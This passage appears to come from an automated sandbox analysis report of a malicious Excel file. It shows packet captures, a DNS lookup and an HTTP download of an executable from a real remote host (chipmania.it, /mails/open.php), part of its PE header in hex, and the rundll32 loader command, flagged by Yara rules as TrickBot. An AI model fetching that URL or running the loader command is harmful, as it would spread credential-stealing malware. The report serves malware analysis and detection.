                                                                                                                                              Feb 20, 2021 02:13:36.173486948 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.173511982 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.173523903 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.173527002 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.173572063 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.173599958 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.173615932 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.173636913 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.173682928 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.182909012 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.230966091 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.230998993 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231014967 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231034994 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231051922 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231123924 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231123924 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231144905 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231164932 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231180906 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231184959 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231189013 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231194019 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231198072 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231203079 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231219053 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231220007 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231236935 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231262922 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231271982 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231276989 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231287003 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231292009 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231314898 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231333017 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231347084 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231348991 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231374025 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231388092 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231447935 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231463909 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231481075 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231487036 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231494904 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.231511116 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231522083 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.231532097 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.232677937 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.289669037 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.289793968 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.289855003 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.289987087 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.290026903 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.290218115 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.290275097 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.290353060 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.290394068 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.290458918 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.290496111 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.290541887 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.290560961 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.290602922 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.290622950 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.290668964 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.290687084 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.290731907 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.290746927 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.290787935 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.290807962 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.290812969 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.290851116 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.290869951 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.290914059 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.290940046 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.290987015 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.291012049 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.291054964 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.291073084 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.291115999 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.291135073 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.291196108 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.291217089 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.291260004 CET4916580192.168.2.22185.81.0.78
                                                                                                                                              Feb 20, 2021 02:13:36.291279078 CET8049165185.81.0.78192.168.2.22
                                                                                                                                              Feb 20, 2021 02:13:36.291321993 CET4916580192.168.2.22185.81.0.78

                                                                                                                                              UDP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Feb 20, 2021 02:13:35.976202965 CET5219753192.168.2.228.8.8.8
                                                                                                                                              Feb 20, 2021 02:13:36.025083065 CET53521978.8.8.8192.168.2.22

                                                                                                                                              DNS Queries

                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                              Feb 20, 2021 02:13:35.976202965 CET192.168.2.228.8.8.80x315eStandard query (0)www.chipmania.itA (IP address)IN (0x0001)

                                                                                                                                              DNS Answers

                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                              Feb 20, 2021 02:13:36.025083065 CET8.8.8.8192.168.2.220x315eNo error (0)www.chipmania.itchipmania.itCNAME (Canonical name)IN (0x0001)
                                                                                                                                              Feb 20, 2021 02:13:36.025083065 CET8.8.8.8192.168.2.220x315eNo error (0)chipmania.it185.81.0.78A (IP address)IN (0x0001)

                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                              • www.chipmania.it

                                                                                                                                              HTTP Packets

                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              0192.168.2.2249165185.81.0.7880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Feb 20, 2021 02:13:36.105571985 CET0OUTGET /mails/open.php HTTP/1.1
                                                                                                                                              Accept: */*
                                                                                                                                              UA-CPU: AMD64
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                              Host: www.chipmania.it
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Feb 20, 2021 02:13:36.173185110 CET2INHTTP/1.1 200 OK
                                                                                                                                              Date: Sat, 20 Feb 2021 01:13:36 GMT
                                                                                                                                              Server: Apache
                                                                                                                                              Content-Disposition: attachment; filename="10.jjkes"
                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                              Connection: Upgrade, Keep-Alive
                                                                                                                                              Keep-Alive: timeout=1, max=100
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                              Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 2a 96 79 f9 4b f8 2a f9 4b f8 2a f9 4b f8 2a a2 23 fb 2b f3 4b f8 2a a2 23 fd 2b 7e 4b f8 2a a2 23 fc 2b eb 4b f8 2a 01 3b fc 2b f6 4b f8 2a 01 3b fb 2b e8 4b f8 2a a2 23 f9 2b fc 4b f8 2a f9 4b f9 2a 9a 4b f8 2a 01 3b fd 2b d8 4b f8 2a 4e 3a f1 2b f4 4b f8 2a 4e 3a f8 2b f8 4b f8 2a 4e 3a 07 2a f8 4b f8 2a 4e 3a fa 2b f8 4b f8 2a 52 69 63 68 f9 4b f8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a4 73 2f 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1b 00 72 42 00 00 a4 03 00 00 00 00 00 c2 7d 41 00 00 10 00 00 00 90 42 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 8f 44 00 60 01 00 00 80 90 44 00 3c 00 00 00 00 c0 44 00 58 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 46 00 b0 11 00 00 60 81 44 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 81 44 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 42 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 71 42 00 00 10 00 00 00 72 42 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 18 08 02 00 00 90 42 00 00 0a 02 00 00 76 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 15 00 00 00 a0 44 00 00 0a 00 00 00 80 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 70 01 00 00 c0 44 00 00 72 01 00 00 8a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b0 11 00 00 00 40 46 00 00 12 00 00 00 fc 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 1a e6 68 07 ba 91 2f 00 00 33 c9 e8 ff 3c 08 00 6a 00 ff d0 33 c0 c3 cc cc cc cc cc cc cc cc
                                                                                                                                              Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$*yK*K*K*#+K*#+~K*#+K*;+K*;+K*#+K*K*K*;+K*N:+K*N:+K*N:*K*N:+K*RichK*PELs/`!rB}AB`F@ D`D<DXp@F`DpD@BX.textqBrB `.rdataBvB@@.data8DD@.rsrcXpDrD@@.reloc@FE@Bhh/3<j3


                                                                                                                                              Code Manipulations

                                                                                                                                              Statistics

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Start time:02:13:32
                                                                                                                                              Start date:20/02/2021
                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                              Imagebase:0x13f3f0000
                                                                                                                                              File size:27641504 bytes
                                                                                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:02:13:38
                                                                                                                                              Start date:20/02/2021
                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                              Imagebase:0xff170000
                                                                                                                                              File size:45568 bytes
                                                                                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:02:13:39
                                                                                                                                              Start date:20/02/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                              Imagebase:0xa80000
                                                                                                                                              File size:44544 bytes
                                                                                                                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2083602374.00000000004A4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2087529774.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2087786589.0000000000958000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2087638222.0000000000470000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2083610400.00000000004A4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                              Reputation:moderate

                                                                                                                                              General

                                                                                                                                              Start time:02:13:40
                                                                                                                                              Start date:20/02/2021
                                                                                                                                              Path:C:\Windows\System32\wermgr.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                              Imagebase:0xff2d0000
                                                                                                                                              File size:50688 bytes
                                                                                                                                              MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate

                                                                                                                                              General

                                                                                                                                              Start time:02:13:40
                                                                                                                                              Start date:20/02/2021
                                                                                                                                              Path:C:\Windows\System32\wermgr.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                              Imagebase:0xff2d0000
                                                                                                                                              File size:50688 bytes
                                                                                                                                              MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate

                                                                                                                                              Disassembly

                                                                                                                                              Code Analysis

                                                                                                                                              Reset < >